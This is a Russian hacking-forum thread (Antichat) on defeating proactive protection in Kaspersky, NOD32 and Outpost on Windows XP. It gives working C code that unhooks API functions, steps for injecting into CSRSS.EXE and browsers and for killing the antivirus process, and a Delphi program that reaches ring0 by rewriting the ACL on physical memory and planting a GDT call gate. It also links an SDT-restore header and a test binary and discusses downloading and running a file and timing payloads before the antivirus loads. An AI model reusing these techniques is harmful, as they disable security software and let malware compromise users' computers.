Форум АНТИЧАТ - Обход проактивной защиты.

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- С/С++, C#, Delphi, .NET, Asm (https://forum.antichat.xyz/forumdisplay.php?f=24)

- - Обход проактивной защиты. (https://forum.antichat.xyz/showthread.php?t=42447)

Обход проактивной защиты.

Проактивная защита что это такое,
Пример: картинка
http://savepic.ru/41203.jpg
Такое сообщение выдает Касперский, если внедренный в него код, пытается изменить другие процессы.
Интересно какую, кнопочку выберут, обладатели Kaspersky Anti-Virus. ;)

Поехали обходить защиту.
на примере самых популярных защит, по опросам Античат.
Какой Фаервол Вы предпочитаете?
Outpost 60.61%
Какой Антивирус Вы предпочитаете?
NOD32 44.81%
AVP(Kaspersky Anti-Virus) 35.31%
Пишем код под WinXP.

1.Внедряемся в CSRSS.EXE
Чем замечателен, этот процесс в XP, он имеет права изменять память других процессов, а этого мы хотим добиться (процесс системный – добавляем себе привелегии SeDebugPrivileg, а из под Гостя можно выбрать процесс попроще, например explorer.exe).
Открываем процесс CSRSS.EXE и пишем туда наш код.
Не получилось, сработала проактивная защита.

NOD32,Outpost ставят НооКи на WriteProcessMemory.
те. Если мы вызываем функцию записи в чужой процесс, сначала выполняется код внедренный в наш процесс, и этот код разрешает или запрещает запись.

Выкидываем шпионов из нашего процесса.
Открываем файл systemroot\ntdll.dll
Сравниваем (первые 10 байт) кода начала API функций, загруженной, к нам память ntdll.dll с тем, что на диске. Собственно, заменяем, несоответствия на оригинал.
Тоже самое проделываем, с остальными библиотеками (Kernel32,User32,AdvApi32)
Касперский , модифицирует адреса функций в EXPORT_DIRECTORY, тоже заменяем, на оригинал.

Вторая попытка:
Открываем процесс CSRSS.EXE и пишем туда наш код.

NOD32,Outpost в пролете. Касперский все перехватил драйвером. (сцуко)
хотя, норд с аутпостом тоже, заметили, но почему-то, ничего не предприняли.

Выкидываем AVP из списка процессов
Ставим Hook на WH_CALLWNDPROC для AVP.EXE, и шлем сообщение WM_QUIT.
Как только Касперский попытается вывести сообщение, о срабатывании системы самозащиты, тут же слетит по команде TerminateProcess,-1
Касперский тоже, заметит, но решит что Вы разрешили это сделать, и тревогу не поднимет.

Третья попытка:
Открываем процесс CSRSS.EXE и пишем туда наш код.
Все прошло удачно. Можно перезапустить Касперского, чтобы пользователь ничего не заметил, и выходить из программы, чтобы в диспетчере задач нас тоже не было.

1.Мониторим запущенные браузеры.
У svchost.exe, плохая репутация, редко кто этому процессу разрешает доступ к интернет.
Ждем запуска популярного браузера (Firefox.exe, Opera.exe, Iexplore.exe)
Инжектим свой код в браузер и у нас появились хоть, какие-то права.

Ну например, загружаем 'http://xserg11.narod.ru/VB.wav' , в 'c:\VB.wav' (64кб 1мин.)
И запускаем ShellExecute(,, 'c:\VB.wav'
VB.wav (с) Nightmarе. Оригинал http://shinobi.org.ru/pranks/get.php?id=12

Для теста вашей защиты можете запустить:
Делает все выше перечисленное.
http://xserg11.narod.ru/tests1.rar (12,5кб) с исходником MASM32
(TESTS.exe 5632байт, чуть покриптован /NODу не нравится/, не закрепляется в системе, ничего нигде не меняет, ничего не ворует, и вообще не вредоносная программа, после использования систему перезагрузить)

Цитата:

Выкидываем шпионов из нашего процесса.
Открываем файл systemroot\ntdll.dll
Сравниваем (первые 10 байт) кода начала API функций, загруженной, к нам память ntdll.dll с тем, что на диске. Собственно, заменяем, несоответствия на оригинал.
Тоже самое проделываем, с остальными библиотеками (Kernel32,User32,AdvApi32)
Касперский , модифицирует адреса функций в EXPORT_DIRECTORY, тоже заменяем, на оригинал.

вот код реализации:

Код:

bool RemoveHook(char * szDllPath, char * szFuncName)

{

        HMODULE lpBase = LoadLibrary(szDllPath);

        LPVOID lpFunc = GetProcAddress(lpBase, szFuncName);



        if ( !lpFunc )

                return false;



        DWORD dwRVA = (DWORD) lpFunc - (DWORD) lpBase;



        HANDLE hFile = CreateFile(szDllPath, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);

        if ( INVALID_HANDLE_VALUE == hFile )

                return false;



        DWORD dwSize = GetFileSize(hFile, NULL);



        HANDLE hMapFile = CreateFileMapping(hFile, NULL, PAGE_READONLY|SEC_IMAGE, 0, dwSize, NULL);



        LPVOID lpBaseMap = MapViewOfFile(hMapFile, FILE_MAP_READ, 0, 0, dwSize);



        LPVOID lpRealFunc = (LPVOID)((DWORD)lpBaseMap+dwRVA);



        DWORD dwOldProtect;

        bool bRes = true;

        if ( VirtualProtect(lpFunc, 10, PAGE_EXECUTE_READWRITE, &dwOldProtect) )

        {

                memcpy(lpFunc, lpRealFunc, 10);

        }

        else

        {

                bRes = false;

        }



        UnmapViewOfFile(lpBaseMap);



        CloseHandle(hMapFile);

        CloseHandle(hFile);



        return bRes;

}

баян. вся проактивка держится на хуке SDT. те драйвер антивира или фаера перехватывает ряд ядерных функций. очистка SDT подробно описана на rootkit.com и называется вроде SDT Restore

Переход из ring3 в ring0 (для XP)
Без DuplicateHandle палится проактивной защитой на уровне драйвера.
И все что я писал в топике, нафик ненужно.

Автора кода не знаю, я добавил только DuplicateHandle.
sn0w добавь в свой код.

Код:

program ring0;



uses

  Windows, NewAclAPI, NewAccCtrl;



type

  TFarCall = packed record

    Offset: DWORD;

    Selector: Word;

  end;

  TGDTInfo = packed record

    Limit: Word;

    Base: DWORD;

  end;

  PUnicodeString = ^TUnicodeString;

  TUnicodeString = packed record

    Length: Word;

    MaximumLength: Word;

    Buffer: Pointer;

  end;

  PObjectAttributes = ^TObjectAttributes;

  TObjectAttributes = packed record

    Length: DWORD;

    RootDirectory: THandle;

    ObjectName: PUnicodeString;

    Attributes: DWORD;

    SecurityDescriptor: Pointer;

    SecurityQualityOfService: Pointer;

  end;

  PGateDescriptor = ^TGateDescriptor;

  TGateDescriptor = packed record

    OffsetLo: Word;

    Selector: Word;

    Attributes: Word;

    OffsetHi: Word;

  end;



  function NtOpenSection(SectionHandle: PHandle; AccessMask: DWORD;

    ObjectAttributes: PObjectAttributes): DWORD; stdcall; external 'NTDLL.DLL';

  procedure RtlInitUnicodeString(DestinationString: PUnicodeString;

    SourceString: PWideChar); stdcall; external 'NTDLL.DLL';



const

  OBJ_CASE_INSENSITIVE = $00000040;

  OBJ_KERNEL_HANDLE = $00000200;



procedure _Ring0; 

asm

  cli

  pushad

  mov bx,100

  mov al,0b6h

  out 43h,al

  mov dx,0012h

  mov ax,34dch

  div bx

  out 42h,al

  mov al,ah

  out 42h,al

  in al,61h

  mov ah,al

  or al,03h

  out 61h,al

  mov ecx,$12345678

@@:push eax

   inc eax

   dec eax

   pop eax

   loop @@

  mov al,ah

  out 61h,al

  popad

  sti

  retf

end;



function QuasiMmGetPhysicalAddress(VirtualAddress: THandle; var Offset: DWORD): DWORD;

begin

  Offset := VirtualAddress and $FFF;

  if (VirtualAddress > $80000000) and (VirtualAddress < $A0000000) then

    Result := VirtualAddress and $1ffff000 else Result := VirtualAddress and $fff000;

end;



function OpenPhysicalMemory: THandle;

const

  DeviceName: PWideChar = '\Device\PhysicalMemory';

var

  PhysMemString: TUnicodeString;

  attributes: TObjectAttributes;

  OldAcl,NewAcl: PACL;

  SD: PSECURITY_DESCRIPTOR;

  Access: EXPLICIT_ACCESS;

  Hprocess:dword;

begin

  RtlInitUnicodeString(@PhysMemString,DeviceName);

  with attributes do

  begin

    Length := SizeOf(TObjectAttributes);

    RootDirectory := 0;

    Attributes := OBJ_CASE_INSENSITIVE or OBJ_KERNEL_HANDLE;

    ObjectName := @PhysMemString;

    SecurityDescriptor := nil;

    SecurityQualityOfService := nil;

  end;

  Hprocess:=GetCurrentProcess;

  NtOpenSection(@Result,READ_CONTROL,@attributes);

  DuplicateHandle(Hprocess,Result,Hprocess,@Result,READ_CONTROL or WRITE_DAC,true,0);

  GetSecurityInfo(Result,SE_KERNEL_OBJECT,DACL_SECURITY_INFORMATION,nil,nil,@OldAcl,nil,SD);

  with Access do

  begin

    grfAccessPermissions := SECTION_MAP_READ or SECTION_MAP_WRITE;

    grfAccessMode := GRANT_ACCESS;

    grfInheritance := NO_INHERITANCE;

    Trustee.pMultipleTrustee := nil;

    Trustee.MultipleTrusteeOperation := NO_MULTIPLE_TRUSTEE;

    Trustee.TrusteeForm := TRUSTEE_IS_NAME;

    Trustee.TrusteeType := TRUSTEE_IS_USER;

    Trustee.ptstrName := 'CURRENT_USER';

  end;

  SetEntriesInAcl(1,@Access,OldAcl,NewAcl);

  SetSecurityInfo(Result,SE_KERNEL_OBJECT,DACL_SECURITY_INFORMATION,nil,nil,NewAcl,nil);

  CloseHandle(Result);

  NtOpenSection(@Result,SECTION_MAP_READ,@attributes);

  DuplicateHandle(Hprocess,Result,Hprocess,@Result,SECTION_MAP_READ or SECTION_MAP_WRITE,true,0);

  LocalFree(DWORD(NewAcl));

  LocalFree(DWORD(SD));

end;



var

  PhysMem: THandle;

  gdt: TGDTInfo;

  ptrGDT,Ring0Proc: Pointer;

  CurrentGate: PGateDescriptor;

  OldGate,NewGate: TGateDescriptor;

  offset,base_address: DWORD;

  FarCall: TFarCall;

begin

  PhysMem := OpenPhysicalMemory;

  Ring0Proc := @_Ring0;

  asm sgdt[gdt] end;

  base_address := QuasiMmGetPhysicalAddress(gdt.Base,offset);

  ptrGDT := MapViewOfFile(PhysMem,FILE_MAP_ALL_ACCESS,0,base_address,gdt.limit+offset);

  CurrentGate := PGateDescriptor(DWORD(ptrGDT)+offset);

  repeat

    CurrentGate := PGateDescriptor(DWORD(CurrentGate)+SizeOf(TGateDescriptor));

    if (CurrentGate.Attributes and $FF00) = 0 then

    begin

      OldGate:=CurrentGate^;

      CurrentGate.Selector := 8; // ring0 code selector

      CurrentGate.OffsetLo := DWORD(Ring0Proc);

      CurrentGate.OffsetHi := DWORD(Ring0Proc) shr 16;

      CurrentGate.Attributes := $EC00;

      FarCall.Offset:=0;

      FarCall.Selector:=DWORD(CurrentGate)-DWORD(ptrGDT)-offset;

      Break;

    end;

  until DWORD(CurrentGate) >= DWORD(ptrGDT)+gdt.limit+offset;

  FlushViewOfFile(CurrentGate,SizeOf(TGateDescriptor));

  asm

    db $0ff,$01d

    dd offset FarCall

  end;

  CurrentGate^ := OldGate;

  UnmapViewOfFile(ptrGDT);

  CloseHandle(PhysMem);

  MessageBoxA(0,'\m/','RING-0',MB_OK);

end.

http://lordofring.tushino.com/SDT.h
Нашёл в интернете и немного переписал. Чистит SDT. Проверил у себя - работает.Но мега-маза в том, что не хочет линковаться с комментом

Код:

#pragma comment(linker,"/ENTRY:WinMain")

Со всеми вытекающими последствиями в весе файла.
https://forum.antichat.ru/showpost.php?p=391561&postcount=15 - вот что нужно. Тогда будет линковаться.

Юзать так:

Код:

#include "SDT.h"

........................

SDT(); //если всё ок возвратит 0 , не ок 1.

Данную багу исправил, файлик перезалил. Примерно +7кб к весу файла.

ммм... Надо взять на заметку. Полезная инфа.

Кстати. на счет этой темы. У меня както возник вопрос.
А именно про касперского. Онже многое ловит через драйвер.
В этоге получается вот такая вешь при загрузки системы:
Сначала грузится виндовые драйвера и драйвер каспера, потом виндовые сервисы, а потом то что нходится в авторане. Ну так вот. А если все свои пакости делать в то время когда драйвер уже загружен, а Gui авира еще не успела загрузиться.
Ведь по идеи даже если чтото будет обнаружено, то врядли будут всякие придупреджения . Или я не прав?

Цитата:

Сообщение от slesh

А если все свои пакости делать в то время когда драйвер уже загружен, а Gui авира еще не успела загрузиться.

В логах каспера будет отчет, об незаконной операции с полным именем файла.
Помечено как допустимое. Тревоги не будет.

2 Xserg ДЫк значит остается тока замутить запуск проги в нужно время.
Чтобы это сделать есть 2 пути.
1) Секция сервисов - скорее всего отпадает. потому что авиры палят установку нового сервиса.
2) Секция предназначенная для программ установок. Запускается в последнюю очередь, но до запуска авторана. На счет того можно ли туда чтолибо писать - хз.
Вроде место не очень паливное, но на авирах еще не проверял.